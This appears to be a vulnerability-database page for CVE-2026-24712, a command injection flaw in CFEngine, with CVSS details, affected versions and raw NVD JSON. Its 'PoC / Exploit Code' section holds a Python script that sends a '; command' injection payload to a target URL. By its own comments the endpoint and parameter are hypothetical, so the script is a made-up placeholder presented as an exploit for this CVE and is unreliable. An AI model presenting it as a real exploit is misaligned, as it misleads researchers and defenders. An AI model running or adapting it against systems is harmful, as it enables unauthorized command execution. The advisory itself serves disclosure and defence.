Security Vulnerability Report
中文
CVE-2026-24712 CVSS 7.3 HIGH

CVE-2026-24712

Published: 2026-05-14 15:16:45
Last Modified: 2026-05-15 15:16:50

Description

Northern.tech CFEngine Enterprise and Community before 3.21.8, 3.24.3, and 3.27.0 allows Command injection.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

CFEngine Enterprise < 3.21.8
CFEngine Enterprise < 3.24.3
CFEngine Enterprise < 3.27.0
CFEngine Community < 3.21.8
CFEngine Community < 3.24.3
CFEngine Community < 3.27.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # Proof of Concept for CVE-2026-24712 (Command Injection) # This script attempts to execute a command on a vulnerable CFEngine instance. import requests import sys def exploit(target_url, command): # Vulnerable endpoint (hypothetical based on CFEngine structure) url = f"{target_url}/api/vulnerable_endpoint" # Payload injection attempts to execute 'id' or the specified command # Using a common command injection separator payload = f"; {command}" headers = { "Content-Type": "application/json", "User-Agent": "CVE-2026-24712-Scanner" } data = { "param": payload # The vulnerable parameter name is hypothetical } try: print(f"[*] Sending payload to {target_url}...") response = requests.post(url, json=data, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response:") print(response.text) else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <command>") print(f"Example: python {sys.argv[0]} http://192.168.1.10 'whoami'") sys.exit(1) target = sys.argv[1] cmd = sys.argv[2] exploit(target, cmd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24712", "sourceIdentifier": "[email protected]", "published": "2026-05-14T15:16:44.977", "lastModified": "2026-05-15T15:16:50.463", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Northern.tech CFEngine Enterprise and Community before 3.21.8, 3.24.3, and 3.27.0 allows Command injection."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://cfengine.com/blog/2026/cve-2026-24710-and-cve-2026-24711-and-cve-2026-24712/", "source": "[email protected]"}, {"url": "https://northern.tech", "source": "[email protected]"}]}}